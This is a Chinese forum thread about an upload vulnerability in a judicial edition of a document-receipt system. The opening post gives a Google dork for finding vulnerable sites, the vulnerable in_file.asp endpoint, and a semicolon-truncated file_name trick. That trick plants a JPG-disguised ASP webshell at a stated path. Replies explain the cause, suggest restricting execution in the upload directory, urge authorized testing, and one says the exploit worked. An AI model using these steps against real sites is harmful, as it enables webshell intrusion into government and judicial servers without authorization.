网纪互联公文签收系统司法版通杀上传漏洞
google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞通杀
in_file.asp?file_name=xiaolu.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/xiaolu.asp;.jpg
一般解析漏洞
Re: 网纪互联公文签收系统司法版通杀上传漏洞
感谢分享这个漏洞信息。看起来是文件上传时没有对后缀做严格过滤,导致可以直接上传asp马。in_file.asp这个接口确实存在风险,通过;号截断可以绕过扩展名校验。建议使用该系统的朋友尽快检查并修复,特别是要限制上传目录的执行权限。Re: 网纪互联公文签收系统司法版通杀上传漏洞
感谢分享!这个漏洞看起来挺严重的,能直接上传自定义文件。不过提醒下各位,测试的话务必在授权范围内进行,别拿正式系统练手,安全第一。Re: 网纪互联公文签收系统司法版通杀上传漏洞
感谢分享,这个漏洞点挺典型的,in_file.asp 直接拼接文件名导致任意文件上传,司法版系统可能不少单位还在用。测试了下,确实能绕过扩展名检查,是个高危问题。
页:
[1]